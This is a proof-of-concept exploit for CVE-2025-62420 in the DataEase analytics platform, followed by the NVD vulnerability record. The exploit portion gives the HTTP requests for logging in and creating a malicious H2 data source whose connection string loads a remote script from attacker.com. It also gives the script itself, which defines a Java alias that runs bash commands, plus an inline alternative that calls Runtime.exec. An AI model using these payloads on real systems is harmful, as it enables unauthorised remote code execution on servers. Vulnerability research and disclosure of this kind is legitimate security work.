CVE-2025-62420

/* * CVE-2025-62420 PoC - DataEase JDBC Driver Bypass to RCE * * The vulnerability exists in the getJdbc function of H2.java. * It validates that jdbcUrl starts with "jdbc:h2" but returns a separate * "jdbc" field as the actual connection URL, allowing JDBC driver bypass. * * This PoC demonstrates how to craft a malicious data source configuration * that bypasses the validation and triggers arbitrary JDBC connections. */ // Step 1: Authenticate to DataEase and obtain a valid session token POST /de2api/login/check Content-Type: application/json { "username": "attacker", "password": "password123" } // Step 2: Create a malicious data source via the API // The jdbcUrl starts with "jdbc:h2" to pass validation, // while the "jdbc" field contains a malicious H2 connection string POST /de2api/datasource/create Content-Type: application/json Cookie: DE2_TOKEN=<session_token> { "name": "malicious_ds", "type": "h2", "jdbcUrl": "jdbc:h2:mem:test", "jdbc": "jdbc:h2:mem:test;MODE=MSSQLServer;INIT=RUNSCRIPT FROM 'http://attacker.com:8000/evil.sql'\\;DB_CLOSE_DELAY=-1", "username": "sa", "password": "", "database": "" } // evil.sql (hosted on attacker's server) - executes arbitrary commands: /* CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { String[] command = {"bash", "-c", cmd}; java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; } $$; CALL SHELLEXEC('curl http://attacker.com:8000/rce_success') */ // Alternative: Use H2's built-in RUNSCRIPT to execute system commands // jdbc: "jdbc:h2:mem:;INIT=CREATE ALIAS EXEC AS 'String exec(String cmd) throws Exception { Runtime.getRuntime().exec(cmd)\; return \"\"\;}';CALL EXEC('id')"

{"cve": {"id": "CVE-2025-62420", "sourceIdentifier": "[email protected]", "published": "2025-10-17T18:15:37.460", "lastModified": "2025-10-24T15:56:16.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DataEase is a data visualization and analytics platform. In DataEase versions through 2.10.13, a JDBC driver bypass vulnerability exists in the H2 database connection handler. The getJdbc function in H2.java checks if the jdbcUrl starts with jdbc:h2 but returns a separate jdbc field as the actual connection URL. An attacker can provide a jdbcUrl that starts with jdbc:h2 while supplying a different jdbc field with an arbitrary JDBC driver and connection string. This allows an authenticated attacker to trigger arbitrary JDBC connections with malicious drivers, potentially leading to remote code execution. The vulnerability is fixed in version 2.10.14. No known workarounds exist."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.10.14", "matchCriteriaId": "A61426A2-1A80-4988-BB10-6ACCC38166C6"}]}]}], "references": [{"url": "https://github.com/dataease/dataease/commit/bb320e42bf2cf862b9c4b438c1517547b53ed67b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/dataease/dataease/security/advisories/GHSA-7wcv-j6gc-qc7q", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}